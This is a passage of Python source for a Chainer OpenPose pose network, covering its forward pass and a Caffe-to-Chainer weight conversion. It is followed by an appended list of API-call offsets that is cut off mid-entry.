data_dir = chainer.dataset.get_dataset_directory('openpose/pose')
model_path = os.path.join(data_dir, models[pretrained_model])
try:
os.makedirs(os.path.dirname(model_path))
except OSError:
pass
chainer.dataset.cache_or_load_file(
model_path,
lambda f: _download_pretrained_model(pretrained_model, f),
lambda f: f)
chainer.serializers.load_npz(model_path, self)
elif pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise OSError('model does not exists: "%s"' % pretrained_model)
chainer.serializers.load_npz(pretrained_model, self)
def __call__(self, x):
    """Run the pose network on an image batch.

    Args:
        x: input image batch (NCHW variable/array fed to conv1_1).

    Returns:
        tuple (pafs, heatmaps): two lists with one entry per stage
        (6 stages total). ``pafs`` holds the part-affinity-field maps
        (L1 branch), ``heatmaps`` the keypoint heatmaps (L2 branch).
    """
    heatmaps = []
    pafs = []
    # VGG-style shared feature extractor (conv1_1 .. conv4_4_CPM).
    h = F.relu(self.conv1_1(x))
    h = F.relu(self.conv1_2(h))
    h = F.max_pooling_2d(h, ksize=2, stride=2)
    h = F.relu(self.conv2_1(h))
    h = F.relu(self.conv2_2(h))
    h = F.max_pooling_2d(h, ksize=2, stride=2)
    h = F.relu(self.conv3_1(h))
    h = F.relu(self.conv3_2(h))
    h = F.relu(self.conv3_3(h))
    h = F.relu(self.conv3_4(h))
    h = F.max_pooling_2d(h, ksize=2, stride=2)
    h = F.relu(self.conv4_1(h))
    h = F.relu(self.conv4_2(h))
    h = F.relu(self.conv4_3_CPM(h))
    h = F.relu(self.conv4_4_CPM(h))
    feature_map = h

    def run_branch(name_fmt, n_convs, inp):
        # Apply convs 1..n_convs of one branch by attribute name;
        # ReLU after every conv except the last (prediction) layer.
        out = inp
        for i in range(1, n_convs):
            out = F.relu(getattr(self, name_fmt.format(i))(out))
        return getattr(self, name_fmt.format(n_convs))(out)

    # stage 1: 5-conv branches on the shared features.
    h1 = run_branch('conv5_{}_CPM_L1', 5, feature_map)  # branch1 (PAFs)
    h2 = run_branch('conv5_{}_CPM_L2', 5, feature_map)  # branch2 (heatmaps)
    pafs.append(h1)
    heatmaps.append(h2)
    # stages 2-6: refine previous predictions concatenated with features.
    for stage in range(2, 7):
        h = F.concat((h1, h2, feature_map), axis=1)  # channel concat
        h1 = run_branch('Mconv{{}}_stage{}_L1'.format(stage), 7, h)
        h2 = run_branch('Mconv{{}}_stage{}_L2'.format(stage), 7, h)
        pafs.append(h1)
        heatmaps.append(h2)
    return pafs, heatmaps
def _download_pretrained_model(model_type, dest_path):
    """Download a caffe model, convert it to chainer, and save as npz.

    Args:
        model_type: key into the module-level ``models`` mapping.
        dest_path: output path for the converted ``.npz`` snapshot.

    Returns:
        True on success.

    Raises:
        OSError: if ``dest_path`` already exists, or the downloaded
            caffe model cannot be found on disk.
    """
    from chainer.links import caffe
    if os.path.exists(dest_path):
        raise OSError('destination already exists: %s' % dest_path)
    basename, ext = os.path.splitext(models[model_type])
    url = base_url + basename + '.caffemodel'
    caffe_model_path = chainer.dataset.cached_download(url)
    if not os.path.exists(caffe_model_path):
        raise OSError('caffe model does not exist: %s' % caffe_model_path)
    print('Converting to chainer model')
    caffe_model = caffe.CaffeFunction(caffe_model_path)
    chainer_model = PoseNet(pretrained_model=None)
    for link in chainer_model.links():
        if not isinstance(link, chainer.Link) or not link.name:
            continue
        # Look layers up directly instead of building eval/exec strings:
        # safer, clearer, and semantically identical.
        dst = getattr(chainer_model, link.name)
        src = caffe_model[link.name]
        if dst.b.shape == src.b.shape and dst.W.shape == src.W.shape:
            dst.W.data = src.W.data
            dst.b.data = src.b.data
            print('Copied layer {0}'.format(link.name))
        else:
            print('Failed to copy layer {0}'.format(link.name))
    chainer.serializers.save_npz(dest_path, chainer_model)
    return True
| [
"chainer.links.Convolution2D",
"os.path.exists",
"chainer.dataset.cached_download",
"chainer.dataset.get_dataset_directory",
"chainer.functions.concat",
"chainer.serializers.save_npz",
"os.path.splitext",
"os.path.join",
"chainer.links.caffe.CaffeFunction",
"chainer.functions.max_pooling_2d",
"o... | [((428, 439), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (436, 439), False, 'import itertools, pkg_resources, sys\n'), ((720, 731), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (728, 731), False, 'import itertools, pkg_resources, sys\n'), ((19383, 19408), 'os.path.exists', 'os.path.exists', (['dest_path'], {}), '(dest_path)\n', (19397, 19408), False, 'import os\n'), ((19499, 19535), 'os.path.splitext', 'os.path.splitext', (['models[model_type]'], {}), '(models[model_type])\n', (19515, 19535), False, 'import os\n'), ((19605, 19641), 'chainer.dataset.cached_download', 'chainer.dataset.cached_download', (['url'], {}), '(url)\n', (19636, 19641), False, 'import chainer\n'), ((19822, 19859), 'chainer.links.caffe.CaffeFunction', 'caffe.CaffeFunction', (['caffe_model_path'], {}), '(caffe_model_path)\n', (19841, 19859), False, 'from chainer.links import caffe\n'), ((20548, 20602), 'chainer.serializers.save_npz', 'chainer.serializers.save_npz', (['dest_path', 'chainer_model'], {}), '(dest_path, chainer_model)\n', (20576, 20602), False, 'import chainer\n'), ((199, 220), 'distutils.version.LooseVersion', 'LooseVersion', (['"""7.0.0"""'], {}), "('7.0.0')\n", (211, 220), False, 'from distutils.version import LooseVersion\n'), ((14164, 14202), 'chainer.functions.max_pooling_2d', 'F.max_pooling_2d', (['h'], {'ksize': '(2)', 'stride': '(2)'}), '(h, ksize=2, stride=2)\n', (14180, 14202), True, 'import chainer.functions as F\n'), ((14287, 14325), 'chainer.functions.max_pooling_2d', 'F.max_pooling_2d', (['h'], {'ksize': '(2)', 'stride': '(2)'}), '(h, ksize=2, stride=2)\n', (14303, 14325), True, 'import chainer.functions as F\n'), ((14482, 14520), 'chainer.functions.max_pooling_2d', 'F.max_pooling_2d', (['h'], {'ksize': '(2)', 'stride': '(2)'}), '(h, ksize=2, stride=2)\n', (14498, 14520), True, 'import chainer.functions as F\n'), ((15271, 15310), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', 
(15279, 15310), True, 'import chainer.functions as F\n'), ((16073, 16112), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (16081, 16112), True, 'import chainer.functions as F\n'), ((16875, 16914), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (16883, 16914), True, 'import chainer.functions as F\n'), ((17677, 17716), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (17685, 17716), True, 'import chainer.functions as F\n'), ((18479, 18518), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (18487, 18518), True, 'import chainer.functions as F\n'), ((19653, 19685), 'os.path.exists', 'os.path.exists', (['caffe_model_path'], {}), '(caffe_model_path)\n', (19667, 19685), False, 'import os\n'), ((1218, 1291), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(3)', 'out_channels': '(64)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=3, out_channels=64, ksize=3, stride=1, pad=1)\n', (1233, 1291), True, 'import chainer.links as L\n'), ((1336, 1410), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(64)', 'out_channels': '(64)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=64, out_channels=64, ksize=3, stride=1, pad=1)\n', (1351, 1410), True, 'import chainer.links as L\n'), ((1455, 1530), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(64)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=64, out_channels=128, ksize=3, stride=1, pad=1)\n', (1470, 1530), True, 'import chainer.links as L\n'), ((1575, 1651), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 
'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (1590, 1651), True, 'import chainer.links as L\n'), ((1696, 1772), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=256, ksize=3, stride=1, pad=1)\n', (1711, 1772), True, 'import chainer.links as L\n'), ((1817, 1893), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)\n', (1832, 1893), True, 'import chainer.links as L\n'), ((1938, 2014), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)\n', (1953, 2014), True, 'import chainer.links as L\n'), ((2059, 2135), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)\n', (2074, 2135), True, 'import chainer.links as L\n'), ((2180, 2256), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(512)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=512, ksize=3, stride=1, pad=1)\n', (2195, 2256), True, 'import chainer.links as L\n'), ((2301, 2377), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(512)', 'out_channels': '(512)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=512, out_channels=512, ksize=3, stride=1, pad=1)\n', (2316, 2377), True, 'import chainer.links as L\n'), ((2426, 2502), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(512)', 'out_channels': '(256)', 'ksize': '(3)', 
'stride': '(1)', 'pad': '(1)'}), '(in_channels=512, out_channels=256, ksize=3, stride=1, pad=1)\n', (2441, 2502), True, 'import chainer.links as L\n'), ((2551, 2627), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=128, ksize=3, stride=1, pad=1)\n', (2566, 2627), True, 'import chainer.links as L\n'), ((2701, 2777), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (2716, 2777), True, 'import chainer.links as L\n'), ((2829, 2905), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (2844, 2905), True, 'import chainer.links as L\n'), ((2957, 3033), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (2972, 3033), True, 'import chainer.links as L\n'), ((3085, 3161), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(512)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=512, ksize=1, stride=1, pad=0)\n', (3100, 3161), True, 'import chainer.links as L\n'), ((3213, 3288), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(512)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=512, out_channels=38, ksize=1, stride=1, pad=0)\n', (3228, 3288), True, 'import chainer.links as L\n'), ((3340, 3416), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 
'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (3355, 3416), True, 'import chainer.links as L\n'), ((3468, 3544), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (3483, 3544), True, 'import chainer.links as L\n'), ((3596, 3672), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (3611, 3672), True, 'import chainer.links as L\n'), ((3724, 3800), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(512)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=512, ksize=1, stride=1, pad=0)\n', (3739, 3800), True, 'import chainer.links as L\n'), ((3852, 3927), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(512)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=512, out_channels=19, ksize=1, stride=1, pad=0)\n', (3867, 3927), True, 'import chainer.links as L\n'), ((4003, 4079), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (4018, 4079), True, 'import chainer.links as L\n'), ((4133, 4209), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (4148, 4209), True, 'import chainer.links as L\n'), ((4263, 4339), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 
'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (4278, 4339), True, 'import chainer.links as L\n'), ((4393, 4469), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (4408, 4469), True, 'import chainer.links as L\n'), ((4523, 4599), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (4538, 4599), True, 'import chainer.links as L\n'), ((4653, 4729), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (4668, 4729), True, 'import chainer.links as L\n'), ((4783, 4858), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (4798, 4858), True, 'import chainer.links as L\n'), ((4912, 4988), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (4927, 4988), True, 'import chainer.links as L\n'), ((5042, 5118), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5057, 5118), True, 'import chainer.links as L\n'), ((5172, 5248), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], 
{'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5187, 5248), True, 'import chainer.links as L\n'), ((5302, 5378), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5317, 5378), True, 'import chainer.links as L\n'), ((5432, 5508), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5447, 5508), True, 'import chainer.links as L\n'), ((5562, 5638), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (5577, 5638), True, 'import chainer.links as L\n'), ((5692, 5767), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (5707, 5767), True, 'import chainer.links as L\n'), ((5843, 5919), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (5858, 5919), True, 'import chainer.links as L\n'), ((5973, 6049), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5988, 6049), True, 'import chainer.links as L\n'), ((6103, 6179), 'chainer.links.Convolution2D', 
'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (6118, 6179), True, 'import chainer.links as L\n'), ((6233, 6309), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (6248, 6309), True, 'import chainer.links as L\n'), ((6363, 6439), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (6378, 6439), True, 'import chainer.links as L\n'), ((6493, 6569), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (6508, 6569), True, 'import chainer.links as L\n'), ((6623, 6698), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (6638, 6698), True, 'import chainer.links as L\n'), ((6752, 6828), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (6767, 6828), True, 'import chainer.links as L\n'), ((6882, 6958), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (6897, 6958), True, 'import chainer.links as L\n'), ((7012, 7088), 
'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7027, 7088), True, 'import chainer.links as L\n'), ((7142, 7218), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7157, 7218), True, 'import chainer.links as L\n'), ((7272, 7348), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7287, 7348), True, 'import chainer.links as L\n'), ((7402, 7478), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (7417, 7478), True, 'import chainer.links as L\n'), ((7532, 7607), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (7547, 7607), True, 'import chainer.links as L\n'), ((7683, 7759), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (7698, 7759), True, 'import chainer.links as L\n'), ((7813, 7889), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7828, 7889), True, 'import chainer.links as L\n'), 
((7943, 8019), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7958, 8019), True, 'import chainer.links as L\n'), ((8073, 8149), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8088, 8149), True, 'import chainer.links as L\n'), ((8203, 8279), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8218, 8279), True, 'import chainer.links as L\n'), ((8333, 8409), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (8348, 8409), True, 'import chainer.links as L\n'), ((8463, 8538), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (8478, 8538), True, 'import chainer.links as L\n'), ((8592, 8668), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (8607, 8668), True, 'import chainer.links as L\n'), ((8722, 8798), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8737, 8798), True, 'import 
chainer.links as L\n'), ((8852, 8928), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8867, 8928), True, 'import chainer.links as L\n'), ((8982, 9058), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8997, 9058), True, 'import chainer.links as L\n'), ((9112, 9188), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (9127, 9188), True, 'import chainer.links as L\n'), ((9242, 9318), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (9257, 9318), True, 'import chainer.links as L\n'), ((9372, 9447), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (9387, 9447), True, 'import chainer.links as L\n'), ((9523, 9599), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (9538, 9599), True, 'import chainer.links as L\n'), ((9653, 9729), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (9668, 9729), 
True, 'import chainer.links as L\n'), ((9783, 9859), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (9798, 9859), True, 'import chainer.links as L\n'), ((9913, 9989), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (9928, 9989), True, 'import chainer.links as L\n'), ((10043, 10119), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10058, 10119), True, 'import chainer.links as L\n'), ((10173, 10249), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (10188, 10249), True, 'import chainer.links as L\n'), ((10303, 10378), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (10318, 10378), True, 'import chainer.links as L\n'), ((10432, 10508), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (10447, 10508), True, 'import chainer.links as L\n'), ((10562, 10638), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, 
